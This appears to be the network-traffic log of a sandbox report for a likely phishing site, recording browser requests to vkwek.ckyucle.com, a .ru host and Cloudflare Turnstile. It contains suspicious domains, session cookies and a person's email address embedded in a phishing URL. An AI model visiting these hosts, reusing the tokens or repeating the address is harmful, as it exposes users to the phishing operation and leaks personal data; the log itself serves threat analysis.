Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/2DUx/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ii9RdnVXMlk4Q0pJOFlzbnA2bDRxWXc9PSIsInZhbHVlIjoia0llVG1KMVREc0xvbDVLeVR1Y2wrYTdaNjFmRlY4d2RBSFRacldCbHg4M0x2RWVaTncyMEtlV1JDYnlxejdjbTZUZzBRMmhTWHRpYzhxQlRkK2JkZzJxS1dLMWFRVUg5TEhPa1RBczRwaC9QbU94UFZCN3huU3ordDN3cHFpdWQiLCJtYWMiOiI3MTEwZTM5YzMwMTJmODU5ZWVlYWE3OTJjYWM2ZDkyODU1ZTEwMmJiNjZiNGQxODE4ZTM0YzE4YzczMWM0OGRiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjZvOEpGSFdCQnIrMzkrenRNc1dQN3c9PSIsInZhbHVlIjoiTkVFZTNSeUR5c0IwaWxVN0FTOGlORGtXUy9nVWR0NGhLRFpRYnFoTUJlSjhmTGdtR0srUnVSTTdKR3l2QjlxY0Q0N3lHMVpaZFQ0d1l6ZFkxK01mN0tJMnE0eVl5V0daekViWUZOWjJmQ0p5YmZGUmwxTXAwWDRtUUZVUnVwWGwiLCJtYWMiOiI4ODFkOTBjYjRmMWIxOTQxMDI0NWJmZmM2MDFhM2FhZGNjNjI4ODc0NWQwZGNiNDY5ZTRhZGUzOWVhZmVhMjk3IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /5575968202461485388865565DuGzcrTyOZLFNLDIYSVXZDPOLLDSEDNQMSF HTTP/1.1Host: nzd92.6gniu68.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://vkwek.ckyucle.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /5575968202461485388865565DuGzcrTyOZLFNLDIYSVXZDPOLLDSEDNQMSF HTTP/1.1Host: nzd92.6gniu68.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/g/d2a97f6b6ec9/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normal HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=89d53a759ec80cb4 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1057242924:1719990587:tl4agvakrAKEFCaNpdhyIRJf0e6GO8XVdySEz6sZojU/89d53a759ec80cb4/e7db8d6cd2b6574 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/89d53a759ec80cb4/1719992438382/SmI1HZgyGcJMdmX HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/89d53a759ec80cb4/1719992438383/c2633130b86ac0ee267e83463b04f0536de9a1df4bb8645bb21edcc61940ee47/nDxduyEORWLmL4W HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/89d53a759ec80cb4/1719992438382/SmI1HZgyGcJMdmX HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1057242924:1719990587:tl4agvakrAKEFCaNpdhyIRJf0e6GO8XVdySEz6sZojU/89d53a759ec80cb4/e7db8d6cd2b6574 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1057242924:1719990587:tl4agvakrAKEFCaNpdhyIRJf0e6GO8XVdySEz6sZojU/89d53a759ec80cb4/e7db8d6cd2b6574 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /2DUx/ HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://vkwek.ckyucle.com/2DUx/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImdBU0dxSWJsZjlwMDU3aEx6ZEd1VUE9PSIsInZhbHVlIjoib2tVdVZNZU1saFAwM1dSRDRVajVVTEVGOFVJUGZ3bG5MOEhhRGRXK0E1ckwwTXdqOU9pVW91Tk1JVTI4Szk0WE00Q1hDdmtkWFdmNFR6UU9nVXBrUjhUdFFjUG92amFzc0l5Z0t3ZlhQQm0vS1p4UCtqN1BBQXQzTEZBNWdpcWwiLCJtYWMiOiI3Nzg0Zjg1NmMyOTlkNGY4NzcxMjE5MTYxN2RhMzQ2YTRhMDNjOWU0OGI5ZmFhNDUzZGE0ZTE1MTkzNDY5YzA5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InQwZGo2bU9yem9wRmhWSHFkUFFDS0E9PSIsInZhbHVlIjoiaXF6UGdXL202ckJzZGorNVZrL0dpbThzaXEzN1BTUGpyMGhjamVxM3Izelg3TDRvQWw1MnhXYVIzV1J5U1BxL2hmV3REY2xZUG9iRnJza3U5dnZJZ0FORWQ0cTVsNmJaUlNKS2V1YlNxZFlWYnYycVlkSklqQmFCTEl5NDB1TVYiLCJtYWMiOiJjMjc3MjYyMWI0NjU2MzIxY2M2NjRmMzU1NWJlMWY3MjhiZWJkOGQzMWIyMjMwYzdjNjZkNzY2MmVkM2VmZGM1IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /wpn0pH3CIM5nU02jRmQ0L1Y1phPSwbSM0ag HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImdBU0dxSWJsZjlwMDU3aEx6ZEd1VUE9PSIsInZhbHVlIjoib2tVdVZNZU1saFAwM1dSRDRVajVVTEVGOFVJUGZ3bG5MOEhhRGRXK0E1ckwwTXdqOU9pVW91Tk1JVTI4Szk0WE00Q1hDdmtkWFdmNFR6UU9nVXBrUjhUdFFjUG92amFzc0l5Z0t3ZlhQQm0vS1p4UCtqN1BBQXQzTEZBNWdpcWwiLCJtYWMiOiI3Nzg0Zjg1NmMyOTlkNGY4NzcxMjE5MTYxN2RhMzQ2YTRhMDNjOWU0OGI5ZmFhNDUzZGE0ZTE1MTkzNDY5YzA5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InQwZGo2bU9yem9wRmhWSHFkUFFDS0E9PSIsInZhbHVlIjoiaXF6UGdXL202ckJzZGorNVZrL0dpbThzaXEzN1BTUGpyMGhjamVxM3Izelg3TDRvQWw1MnhXYVIzV1J5U1BxL2hmV3REY2xZUG9iRnJza3U5dnZJZ0FORWQ0cTVsNmJaUlNKS2V1YlNxZFlWYnYycVlkSklqQmFCTEl5NDB1TVYiLCJtYWMiOiJjMjc3MjYyMWI0NjU2MzIxY2M2NjRmMzU1NWJlMWY3MjhiZWJkOGQzMWIyMjMwYzdjNjZkNzY2MmVkM2VmZGM1IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /2DUx/?W-crystal.begin@schulergroup.com HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://vkwek.ckyucle.com/2DUx/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjIyaWZWVjlWK2x3OHpRZTExOTYyY0E9PSIsInZhbHVlIjoiWHNialhqU2VsQU5XaEc5Z0tBTC9Xc2FJL1Y5Z2VZbHFWVHgxMWh0cFhXQTVvd3BOd2hDa0p6NzNmcXh1YUlQa3lrL3ZuYURJbUo3cXJLZkZJOWhiblIxcHIzQTFjb3lNMTNWdkVpWmJ4L1FwMmVUYU9JMVk2bGwxczhzWjJBV1ciLCJtYWMiOiJhMWUwOGM3YTg1MDZjYTE2YjM2MmFjOWZlMjZlYWE0NGVhNWZmNDRjOWJiYjIzYTEyMWZjYjA1ZWJiZTljOTdlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InBiU3hwRWZDMmk3a0w5VVdrak1VdGc9PSIsInZhbHVlIjoiN0pGREJJMWE3UkNMVUsrRXMrYjlwSUhQeit1SFBJZlFudllCQTBydUJUNE9pNlhLQ1BVWS9TeWFsMXVjWS9NdlRqYktzbVNWTFREbVY1MDRIT28xWDMvemZmdi95QWUxMnBhMDd6YjNzYytoR2ZIL3oyZjdHSFhkNDhWcWl0MFoiLCJtYWMiOiJhYjVkOGVmOWMzMjc3OWEyOTNkMjQ2YWJjZDIxNzM0N2MzYTBiOWRlYWM2M2MyNmU4MTA5YTJkMGYyYmUyZTQyIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://vkwek.ckyucle.com/2DUx/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ikp6bWxUaVJGcWJad3NFeGtVT1Y2QlE9PSIsInZhbHVlIjoiOTlSQXB3ektMQi9UZjNWdVRycGN0WU9GeHhmU1FpUFhGajZ0cUtwQ1lmVWc4Q2lHZG9rbHZSeEVjTWNrL2JwbEllOE5ZODFGRUY1WDhjc0NUM2NXRmN2akF1MDdiK3RiL0RsSk40NkUzS2FLb1RWc2V4K2M4UE5ubngyRFM5T3oiLCJtYWMiOiJkNjU4ZThiOGIzNWFkYmVhMWM1OTVkZTBiZGEyNzgyMmIzY2IzYWJjOTczYWYxZGI5YTczMzM2MGY4ZTc4OWRmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InYxZ01pTTRXNFRrUlNONit4Zkk3YWc9PSIsInZhbHVlIjoiM0JCNUN6ckFzUGI2akx1T2U1ckJ6UWN1MVBadVo3elJYZytpK1lQV0RFTVVubmVwRHZWYjkwWk1MczBOdm1vUGJIUVRKTmxWdjFCU212dnFDNFFCTzhUT3RBdzROd3kyNkU1RWd3RFZVa0JEMVFmYWhxYVBmUlBKVytFQTlpbmIiLCJtYWMiOiIwMGIyZjU4YWRjZTlkNDA1OWM4YjY5YmVmZTQ3ZDUyZTk5OGFhNDEzNTI5NDFjZDQyODVhMzdjMmEyODViYTRjIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /12TvEGAMcd3aPS6720 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /xy12R7tzrssHzef25 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /pqJEZxAGJZqUBhc85R9yzrCUwx40 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://vkwek.ckyucle.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
